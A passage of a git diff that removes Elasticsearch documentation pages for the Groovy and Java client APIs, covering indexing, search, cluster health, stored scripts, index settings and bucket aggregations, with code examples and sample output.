Maven Repository - -The Groovy API is hosted on -http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22elasticsearch-groovy%22[Maven -Central]. - -For example, you can define the latest version in your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch - elasticsearch-groovy - {version} - --------------------------------------------------- - -include::anatomy.asciidoc[] - -include::client.asciidoc[] - -include::index_.asciidoc[] - -include::get.asciidoc[] - -include::delete.asciidoc[] - -include::search.asciidoc[] diff --git a/docs/groovy-api/index_.asciidoc b/docs/groovy-api/index_.asciidoc deleted file mode 100644 index deefb30e031..00000000000 --- a/docs/groovy-api/index_.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[index_]] -== Index API - -The index API is very similar to the -// {javaclient}/java-docs-index.html[] -Java index API. The Groovy -extension to it is the ability to provide the indexed source using a -closure. For example: - -[source,groovy] --------------------------------------------------- -def indexR = client.index { - index "test" - type "_doc" - id "1" - source { - test = "value" - complex { - value1 = "value1" - value2 = "value2" - } - } -} --------------------------------------------------- - -In the above example, the source closure itself gets transformed into an -XContent (defaults to JSON). In order to change how the source closure -is serialized, a global (static) setting can be set on the `GClient` by -changing the `indexContentType` field. - -Note also that the `source` can be set using the typical Java based -APIs, the `Closure` option is a Groovy extension. diff --git a/docs/groovy-api/search.asciidoc b/docs/groovy-api/search.asciidoc deleted file mode 100644 index 7834e45abc8..00000000000 --- a/docs/groovy-api/search.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ -[[search]] -== Search API - -The search API is very similar to the -// {javaclient}/java-search.html[] -Java search API. The Groovy -extension allows to provide the search source to execute as a `Closure` -including the query itself (similar to GORM criteria builder): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - query { - term(test: "value") - } - } -} - -search.response.hits.each {SearchHit hit -> - println "Got hit $hit.id from $hit.index/$hit.type" -} --------------------------------------------------- - -It can also be executed using the "Java API" while still using a closure -for the query: - -[source,groovy] --------------------------------------------------- -def search = node.client.prepareSearch("test").setQuery({ - term(test: "value") -}).gexecute(); - -search.response.hits.each {SearchHit hit -> - println "Got hit $hit.id from $hit.index/$hit.type" -} --------------------------------------------------- - -The format of the search `Closure` follows the same JSON syntax as the -{ref}/search-search.html[Search API] request. - - -[[more-examples]] -=== More examples - -Term query where multiple values are provided (see -{ref}/query-dsl-terms-query.html[terms]): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - query { - terms(test: ["value1", "value2"]) - } - } -} --------------------------------------------------- - -Query string (see -{ref}/query-dsl-query-string-query.html[query string]): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - query { - query_string( - fields: ["test"], - query: "value1 value2") - } - } -} --------------------------------------------------- - -Pagination (see -{ref}/search-request-from-size.html[from/size]): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - from = 0 - size = 10 - query { - term(test: "value") - } - } -} --------------------------------------------------- - -Sorting (see {ref}/search-request-sort.html[sort]): - -[source,groovy] --------------------------------------------------- -def search = node.client.search { - indices "test" - types "_doc" - source { - query { - term(test: "value") - } - sort = [ - date : [ order: "desc"] - ] - } -} --------------------------------------------------- diff --git a/docs/java-api/admin/cluster/health.asciidoc b/docs/java-api/admin/cluster/health.asciidoc deleted file mode 100644 index 615a011cf72..00000000000 --- a/docs/java-api/admin/cluster/health.asciidoc +++ /dev/null @@ -1,76 +0,0 @@ -[[java-admin-cluster-health]] -==== Cluster Health - -[[java-admin-cluster-health-health]] -===== Health - -The cluster health API allows to get a very simple status on the health of the cluster and also can give you -some technical information about the cluster status per index: - -[source,java] --------------------------------------------------- -ClusterHealthResponse healths = client.admin().cluster().prepareHealth().get(); <1> -String clusterName = healths.getClusterName(); <2> -int numberOfDataNodes = healths.getNumberOfDataNodes(); <3> -int numberOfNodes = healths.getNumberOfNodes(); <4> - -for (ClusterIndexHealth health : healths.getIndices().values()) { <5> - String index = health.getIndex(); <6> - int numberOfShards = health.getNumberOfShards(); <7> - int numberOfReplicas = health.getNumberOfReplicas(); <8> - ClusterHealthStatus status = health.getStatus(); <9> -} --------------------------------------------------- -<1> Get information for all indices -<2> Access the cluster name -<3> Get the total number of data nodes -<4> Get the total number of nodes -<5> Iterate over all indices -<6> Index name -<7> Number of shards -<8> Number of replicas -<9> Index status - -[[java-admin-cluster-health-wait-status]] -===== Wait for status - -You can use the cluster health API to wait for a specific status for the whole cluster or for a given index: - -[source,java] --------------------------------------------------- -client.admin().cluster().prepareHealth() <1> - .setWaitForYellowStatus() <2> - .get(); -client.admin().cluster().prepareHealth("company") <3> - .setWaitForGreenStatus() <4> - .get(); - -client.admin().cluster().prepareHealth("employee") <5> - .setWaitForGreenStatus() <6> - .setTimeout(TimeValue.timeValueSeconds(2)) <7> - .get(); --------------------------------------------------- -<1> Prepare a health request -<2> Wait for the cluster being yellow -<3> Prepare the health request for index `company` -<4> Wait for the index being green -<5> Prepare the health request for index `employee` -<6> Wait for the index being green -<7> Wait at most for 2 seconds - -If the index does not have the expected status and you want to fail in that case, you need -to explicitly interpret the result: - -[source,java] --------------------------------------------------- -ClusterHealthResponse response = client.admin().cluster().prepareHealth("company") - .setWaitForGreenStatus() <1> - .get(); - -ClusterHealthStatus status = response.getIndices().get("company").getStatus(); -if (!status.equals(ClusterHealthStatus.GREEN)) { - throw new RuntimeException("Index is in " + status + " state"); <2> -} --------------------------------------------------- -<1> Wait for the index being green -<2> Throw an exception if not `GREEN` diff --git a/docs/java-api/admin/cluster/index.asciidoc b/docs/java-api/admin/cluster/index.asciidoc deleted file mode 100644 index 4e1850a34fe..00000000000 --- a/docs/java-api/admin/cluster/index.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[[java-admin-cluster]] -=== Cluster Administration - -To access cluster Java API, you need to call `cluster()` method from an <>: - -[source,java] --------------------------------------------------- -ClusterAdminClient clusterAdminClient = client.admin().cluster(); --------------------------------------------------- - -[NOTE] -In the rest of this guide, we will use `client.admin().cluster()`. - -include::health.asciidoc[] - -include::stored-scripts.asciidoc[] diff --git a/docs/java-api/admin/cluster/stored-scripts.asciidoc b/docs/java-api/admin/cluster/stored-scripts.asciidoc deleted file mode 100644 index 5ebf89e92be..00000000000 --- a/docs/java-api/admin/cluster/stored-scripts.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[stored-scripts]] -==== Stored Scripts API - -The stored script API allows one to interact with scripts and templates -stored in Elasticsearch. It can be used to create, update, get, -and delete stored scripts and templates. - -[source,java] --------------------------------------------------- -PutStoredScriptResponse response = client.admin().cluster().preparePutStoredScript() - .setId("script1") - .setContent(new BytesArray("{\"script\": {\"lang\": \"painless\", \"source\": \"_score * doc['my_numeric_field'].value\"} }"), XContentType.JSON) - .get(); - -GetStoredScriptResponse response = client().admin().cluster().prepareGetStoredScript() - .setId("script1") - .get(); - -DeleteStoredScriptResponse response = client().admin().cluster().prepareDeleteStoredScript() - .setId("script1") - .get(); --------------------------------------------------- - -To store templates simply use "mustache" for the scriptLang. - -===== Script Language - -The put stored script API allows one to set the language of the stored script. -If one is not provided the default scripting language will be used. diff --git a/docs/java-api/admin/index.asciidoc b/docs/java-api/admin/index.asciidoc deleted file mode 100644 index 41599a82c7b..00000000000 --- a/docs/java-api/admin/index.asciidoc +++ /dev/null @@ -1,18 +0,0 @@ -[[java-admin]] -== Java API Administration - -Elasticsearch provides a full Java API to deal with administration tasks. - -To access them, you need to call `admin()` method from a client to get an `AdminClient`: - -[source,java] --------------------------------------------------- -AdminClient adminClient = client.admin(); --------------------------------------------------- - -[NOTE] -In the rest of this guide, we will use `client.admin()`. - -include::indices/index.asciidoc[] - -include::cluster/index.asciidoc[] diff --git a/docs/java-api/admin/indices/create-index.asciidoc b/docs/java-api/admin/indices/create-index.asciidoc deleted file mode 100644 index c04b3c8ef4f..00000000000 --- a/docs/java-api/admin/indices/create-index.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[java-admin-indices-create-index]] -==== Create Index - -Using an <>, you can create an index with all default settings and no mapping: - -[source,java] --------------------------------------------------- -client.admin().indices().prepareCreate("twitter").get(); --------------------------------------------------- - -[discrete] -[[java-admin-indices-create-index-settings]] -===== Index Settings - -Each index created can have specific settings associated with it. - -[source,java] --------------------------------------------------- -client.admin().indices().prepareCreate("twitter") - .setSettings(Settings.builder() <1> - .put("index.number_of_shards", 3) - .put("index.number_of_replicas", 2) - ) - .get(); <2> --------------------------------------------------- -<1> Settings for this index -<2> Execute the action and wait for the result - diff --git a/docs/java-api/admin/indices/get-settings.asciidoc b/docs/java-api/admin/indices/get-settings.asciidoc deleted file mode 100644 index 844aaf65ec9..00000000000 --- a/docs/java-api/admin/indices/get-settings.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[java-admin-indices-get-settings]] -==== Get Settings - -The get settings API allows to retrieve settings of index/indices: - -[source,java] --------------------------------------------------- -GetSettingsResponse response = client.admin().indices() - .prepareGetSettings("company", "employee").get(); <1> -for (ObjectObjectCursor cursor : response.getIndexToSettings()) { <2> - String index = cursor.key; <3> - Settings settings = cursor.value; <4> - Integer shards = settings.getAsInt("index.number_of_shards", null); <5> - Integer replicas = settings.getAsInt("index.number_of_replicas", null); <6> -} --------------------------------------------------- -<1> Get settings for indices `company` and `employee` -<2> Iterate over results -<3> Index name -<4> Settings for the given index -<5> Number of shards for this index -<6> Number of replicas for this index diff --git a/docs/java-api/admin/indices/index.asciidoc b/docs/java-api/admin/indices/index.asciidoc deleted file mode 100644 index bbd365076c7..00000000000 --- a/docs/java-api/admin/indices/index.asciidoc +++ /dev/null @@ -1,21 +0,0 @@ -[[java-admin-indices]] -=== Indices Administration - -To access indices Java API, you need to call `indices()` method from an <>: - -[source,java] --------------------------------------------------- -IndicesAdminClient indicesAdminClient = client.admin().indices(); --------------------------------------------------- - -[NOTE] -In the rest of this guide, we will use `client.admin().indices()`. - -include::create-index.asciidoc[] - -include::put-mapping.asciidoc[] - -include::refresh.asciidoc[] - -include::get-settings.asciidoc[] -include::update-settings.asciidoc[] diff --git a/docs/java-api/admin/indices/put-mapping.asciidoc b/docs/java-api/admin/indices/put-mapping.asciidoc deleted file mode 100644 index 4c14310f6dc..00000000000 --- a/docs/java-api/admin/indices/put-mapping.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[java-admin-indices-put-mapping]] - -==== Put Mapping - -You can add mappings at index creation time: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-tests}/IndicesDocumentationIT.java[index-with-mapping] --------------------------------------------------- -<1> <> called `twitter` -<2> Add a `_doc` type with a field called `message` that has the data type `text`. - -There are several variants of the above `addMapping` method, some taking an -`XContentBuilder` or a `Map` with the mapping definition as arguments. Make sure -to check the javadocs to pick the simplest one for your use case. - -The PUT mapping API also allows for updating the mapping after index -creation. In this case you can provide the mapping as a String similar -to the REST API syntax: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{client-tests}/IndicesDocumentationIT.java[putMapping-request-source] --------------------------------------------------- -<1> Puts a mapping on existing index called `twitter` -<2> Adds a new field `name` to the mapping -<3> The type can be also provided within the source - -:base-dir!: diff --git a/docs/java-api/admin/indices/refresh.asciidoc b/docs/java-api/admin/indices/refresh.asciidoc deleted file mode 100644 index 856c270daf3..00000000000 --- a/docs/java-api/admin/indices/refresh.asciidoc +++ /dev/null @@ -1,19 +0,0 @@ -[[java-admin-indices-refresh]] -==== Refresh - -The refresh API allows to explicitly refresh one or more index: - -[source,java] --------------------------------------------------- -client.admin().indices().prepareRefresh().get(); <1> -client.admin().indices() - .prepareRefresh("twitter") <2> - .get(); -client.admin().indices() - .prepareRefresh("twitter", "company") <3> - .get(); --------------------------------------------------- -<1> Refresh all indices -<2> Refresh one index -<3> Refresh many indices - diff --git a/docs/java-api/admin/indices/update-settings.asciidoc b/docs/java-api/admin/indices/update-settings.asciidoc deleted file mode 100644 index 9c2cba2adf0..00000000000 --- a/docs/java-api/admin/indices/update-settings.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[[java-admin-indices-update-settings]] -==== Update Indices Settings - -You can change index settings by calling: - -[source,java] --------------------------------------------------- -client.admin().indices().prepareUpdateSettings("twitter") <1> - .setSettings(Settings.builder() <2> - .put("index.number_of_replicas", 0) - ) - .get(); --------------------------------------------------- -<1> Index to update -<2> Settings - diff --git a/docs/java-api/aggregations/bucket.asciidoc b/docs/java-api/aggregations/bucket.asciidoc deleted file mode 100644 index fe2e0ea9be3..00000000000 --- a/docs/java-api/aggregations/bucket.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[[java-aggregations-bucket]] - -include::bucket/global-aggregation.asciidoc[] - -include::bucket/filter-aggregation.asciidoc[] - -include::bucket/filters-aggregation.asciidoc[] - -include::bucket/missing-aggregation.asciidoc[] - -include::bucket/nested-aggregation.asciidoc[] - -include::bucket/reverse-nested-aggregation.asciidoc[] - -include::bucket/children-aggregation.asciidoc[] - -include::bucket/terms-aggregation.asciidoc[] - -include::bucket/significantterms-aggregation.asciidoc[] - -include::bucket/range-aggregation.asciidoc[] - -include::bucket/daterange-aggregation.asciidoc[] - -include::bucket/iprange-aggregation.asciidoc[] - -include::bucket/histogram-aggregation.asciidoc[] - -include::bucket/datehistogram-aggregation.asciidoc[] - -include::bucket/geodistance-aggregation.asciidoc[] - -include::bucket/geohashgrid-aggregation.asciidoc[] diff --git a/docs/java-api/aggregations/bucket/children-aggregation.asciidoc b/docs/java-api/aggregations/bucket/children-aggregation.asciidoc deleted file mode 100644 index f6a23fdafe9..00000000000 --- a/docs/java-api/aggregations/bucket/children-aggregation.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[java-aggs-bucket-children]] -==== Children Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-children-aggregation.html[Children Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .children("agg", "reseller"); <1> --------------------------------------------------- -1. `"agg"` is the name of the aggregation and `"reseller"` is the child type - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.join.aggregations.Children; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Children agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/datehistogram-aggregation.asciidoc b/docs/java-api/aggregations/bucket/datehistogram-aggregation.asciidoc deleted file mode 100644 index 610262b046c..00000000000 --- a/docs/java-api/aggregations/bucket/datehistogram-aggregation.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[java-aggs-bucket-datehistogram]] -==== Date Histogram Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-datehistogram-aggregation.html[Date Histogram Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .dateHistogram("agg") - .field("dateOfBirth") - .calendarInterval(DateHistogramInterval.YEAR); --------------------------------------------------- - -Or if you want to set an interval of 10 days: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .dateHistogram("agg") - .field("dateOfBirth") - .fixedInterval(DateHistogramInterval.days(10)); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.histogram.Histogram; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Histogram agg = sr.getAggregations().get("agg"); - -// For each entry -for (Histogram.Bucket entry : agg.getBuckets()) { - DateTime key = (DateTime) entry.getKey(); // Key - String keyAsString = entry.getKeyAsString(); // Key as String - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], date [{}], doc_count [{}]", keyAsString, key.getYear(), docCount); -} --------------------------------------------------- - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -key [1942-01-01T00:00:00.000Z], date [1942], doc_count [1] -key [1945-01-01T00:00:00.000Z], date [1945], doc_count [1] -key [1946-01-01T00:00:00.000Z], date [1946], doc_count [1] -... -key [2005-01-01T00:00:00.000Z], date [2005], doc_count [1] -key [2007-01-01T00:00:00.000Z], date [2007], doc_count [2] -key [2008-01-01T00:00:00.000Z], date [2008], doc_count [3] --------------------------------------------------- - -===== Order - -Supports the same order functionality as the <>. diff --git a/docs/java-api/aggregations/bucket/daterange-aggregation.asciidoc b/docs/java-api/aggregations/bucket/daterange-aggregation.asciidoc deleted file mode 100644 index fa8f31e8cd0..00000000000 --- a/docs/java-api/aggregations/bucket/daterange-aggregation.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[java-aggs-bucket-daterange]] -==== Date Range Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-daterange-aggregation.html[Date Range Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .dateRange("agg") - .field("dateOfBirth") - .format("yyyy") - .addUnboundedTo("1950") // from -infinity to 1950 (excluded) - .addRange("1950", "1960") // from 1950 to 1960 (excluded) - .addUnboundedFrom("1960"); // from 1960 to +infinity --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.range.Range; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Range agg = sr.getAggregations().get("agg"); - -// For each entry -for (Range.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // Date range as key - DateTime fromAsDate = (DateTime) entry.getFrom(); // Date bucket from as a Date - DateTime toAsDate = (DateTime) entry.getTo(); // Date bucket to as a Date - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], from [{}], to [{}], doc_count [{}]", key, fromAsDate, toAsDate, docCount); -} --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -key [*-1950], from [null], to [1950-01-01T00:00:00.000Z], doc_count [8] -key [1950-1960], from [1950-01-01T00:00:00.000Z], to [1960-01-01T00:00:00.000Z], doc_count [5] -key [1960-*], from [1960-01-01T00:00:00.000Z], to [null], doc_count [37] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/filter-aggregation.asciidoc b/docs/java-api/aggregations/bucket/filter-aggregation.asciidoc deleted file mode 100644 index 3ffb05202bb..00000000000 --- a/docs/java-api/aggregations/bucket/filter-aggregation.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[java-aggs-bucket-filter]] -==== Filter Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-filter-aggregation.html[Filter Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders - .filter("agg", QueryBuilders.termQuery("gender", "male")); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.filter.Filter; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Filter agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/filters-aggregation.asciidoc b/docs/java-api/aggregations/bucket/filters-aggregation.asciidoc deleted file mode 100644 index 0b782304dac..00000000000 --- a/docs/java-api/aggregations/bucket/filters-aggregation.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[java-aggs-bucket-filters]] -==== Filters Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-filters-aggregation.html[Filters Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .filters("agg", - new FiltersAggregator.KeyedFilter("men", QueryBuilders.termQuery("gender", "male")), - new FiltersAggregator.KeyedFilter("women", QueryBuilders.termQuery("gender", "female"))); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.filters.Filters; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Filters agg = sr.getAggregations().get("agg"); - -// For each entry -for (Filters.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // bucket key - long docCount = entry.getDocCount(); // Doc count - logger.info("key [{}], doc_count [{}]", key, docCount); -} --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -key [men], doc_count [4982] -key [women], doc_count [5018] --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/geodistance-aggregation.asciidoc b/docs/java-api/aggregations/bucket/geodistance-aggregation.asciidoc deleted file mode 100644 index 472c3ac59bf..00000000000 --- a/docs/java-api/aggregations/bucket/geodistance-aggregation.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[[java-aggs-bucket-geodistance]] -==== Geo Distance Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-geodistance-aggregation.html[Geo Distance Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .geoDistance("agg", new GeoPoint(48.84237171118314,2.33320027692004)) - .field("address.location") - .unit(DistanceUnit.KILOMETERS) - .addUnboundedTo(3.0) - .addRange(3.0, 10.0) - .addRange(10.0, 500.0); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.range.Range; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Range agg = sr.getAggregations().get("agg"); - -// For each entry -for (Range.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // key as String - Number from = (Number) entry.getFrom(); // bucket from value - Number to = (Number) entry.getTo(); // bucket to value - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], from [{}], to [{}], doc_count [{}]", key, from, to, docCount); -} --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -key [*-3.0], from [0.0], to [3.0], doc_count [161] -key [3.0-10.0], from [3.0], to [10.0], doc_count [460] -key [10.0-500.0], from [10.0], to [500.0], doc_count [4925] --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/geohashgrid-aggregation.asciidoc b/docs/java-api/aggregations/bucket/geohashgrid-aggregation.asciidoc deleted file mode 100644 index 19e3f033493..00000000000 --- a/docs/java-api/aggregations/bucket/geohashgrid-aggregation.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[[java-aggs-bucket-geohashgrid]] -==== Geo Hash Grid Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-geohashgrid-aggregation.html[Geo Hash Grid Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .geohashGrid("agg") - .field("address.location") - .precision(4); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.geogrid.GeoHashGrid; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -GeoHashGrid agg = sr.getAggregations().get("agg"); - -// For each entry -for (GeoHashGrid.Bucket entry : agg.getBuckets()) { - String keyAsString = entry.getKeyAsString(); // key as String - GeoPoint key = (GeoPoint) entry.getKey(); // key as geo point - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], point {}, doc_count [{}]", keyAsString, key, docCount); -} --------------------------------------------------- - -This will basically produce: - -[source,text] --------------------------------------------------- -key [gbqu], point [47.197265625, -1.58203125], doc_count [1282] -key [gbvn], point [50.361328125, -4.04296875], doc_count [1248] -key [u1j0], point [50.712890625, 7.20703125], doc_count [1156] -key [u0j2], point [45.087890625, 7.55859375], doc_count [1138] -... --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/global-aggregation.asciidoc b/docs/java-api/aggregations/bucket/global-aggregation.asciidoc deleted file mode 100644 index e0a731159ad..00000000000 --- a/docs/java-api/aggregations/bucket/global-aggregation.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[java-aggs-bucket-global]] -==== Global Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-global-aggregation.html[Global Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders - .global("agg") - .subAggregation(AggregationBuilders.terms("genders").field("gender")); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.global.Global; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Global agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- diff --git a/docs/java-api/aggregations/bucket/histogram-aggregation.asciidoc b/docs/java-api/aggregations/bucket/histogram-aggregation.asciidoc deleted file mode 100644 index 59bb555401c..00000000000 --- a/docs/java-api/aggregations/bucket/histogram-aggregation.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -[[java-aggs-bucket-histogram]] -==== Histogram Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-histogram-aggregation.html[Histogram Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .histogram("agg") - .field("height") - .interval(1); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.histogram.Histogram; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Histogram agg = sr.getAggregations().get("agg"); - -// For each entry -for (Histogram.Bucket entry : agg.getBuckets()) { - Number key = (Number) entry.getKey(); // Key - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], doc_count [{}]", key, docCount); -} --------------------------------------------------- - -===== Order - -Supports the same order functionality as the <>. diff --git a/docs/java-api/aggregations/bucket/iprange-aggregation.asciidoc b/docs/java-api/aggregations/bucket/iprange-aggregation.asciidoc deleted file mode 100644 index a2c07df1b26..00000000000 --- a/docs/java-api/aggregations/bucket/iprange-aggregation.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[[java-aggs-bucket-iprange]] -==== Ip Range Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-iprange-aggregation.html[Ip Range Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .ipRange("agg") - .field("ip") - .addUnboundedTo("192.168.1.0") // from -infinity to 192.168.1.0 (excluded) - .addRange("192.168.1.0", "192.168.2.0") // from 192.168.1.0 to 192.168.2.0 (excluded) - .addUnboundedFrom("192.168.2.0"); // from 192.168.2.0 to +infinity --------------------------------------------------- - -Note that you could also use ip masks as ranges: - -[source,java] --------------------------------------------------- -AggregationBuilder aggregation = - AggregationBuilders - .ipRange("agg") - .field("ip") - .addMaskRange("192.168.0.0/32") - .addMaskRange("192.168.0.0/24") - .addMaskRange("192.168.0.0/16"); --------------------------------------------------- - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.range.Range; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Range agg = sr.getAggregations().get("agg"); - -// For each entry -for (Range.Bucket entry : agg.getBuckets()) { - String key = entry.getKeyAsString(); // Ip range as key - String fromAsString = entry.getFromAsString(); // Ip bucket from as a String - String toAsString = entry.getToAsString(); // Ip bucket to as a String - long docCount = entry.getDocCount(); // Doc count - - logger.info("key [{}], from [{}], to [{}], doc_count [{}]", key, fromAsString, toAsString, docCount); -} --------------------------------------------------- - -This will basically produce for the first example: - -[source,text] --------------------------------------------------- -key [*-192.168.1.0], from [null], to [192.168.1.0], doc_count [13] -key [192.168.1.0-192.168.2.0], from [192.168.1.0], to [192.168.2.0], doc_count [14] -key [192.168.2.0-*], from [192.168.2.0], to [null], doc_count [23] --------------------------------------------------- - -And for the second one (using Ip masks): - -[source,text] --------------------------------------------------- -key [192.168.0.0/32], from [192.168.0.0], to [192.168.0.1], doc_count [0] -key [192.168.0.0/24], from [192.168.0.0], to [192.168.1.0], doc_count [13] -key [192.168.0.0/16], from [192.168.0.0], to [192.169.0.0], doc_count [50] --------------------------------------------------- - diff --git a/docs/java-api/aggregations/bucket/missing-aggregation.asciidoc b/docs/java-api/aggregations/bucket/missing-aggregation.asciidoc deleted file mode 100644 index 31d21604dc5..00000000000 --- a/docs/java-api/aggregations/bucket/missing-aggregation.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[java-aggs-bucket-missing]] -==== Missing Aggregation - -Here is how you can use -{ref}/search-aggregations-bucket-missing-aggregation.html[Missing Aggregation] -with Java API. - - -===== Prepare aggregation request - -Here is an example on how to create the aggregation request: - -[source,java] --------------------------------------------------- -AggregationBuilders.missing("agg").field("gender"); --------------------------------------------------- - - -===== Use aggregation response - -Import Aggregation definition classes: - -[source,java] --------------------------------------------------- -import org.elasticsearch.search.aggregations.bucket.missing.Missing; --------------------------------------------------- - -[source,java] --------------------------------------------------- -// sr is here your SearchResponse object -Missing agg = sr.getAggregations().get("agg"); -agg.getDocCount(); // Doc count --------------------------------------------------- - diff --git 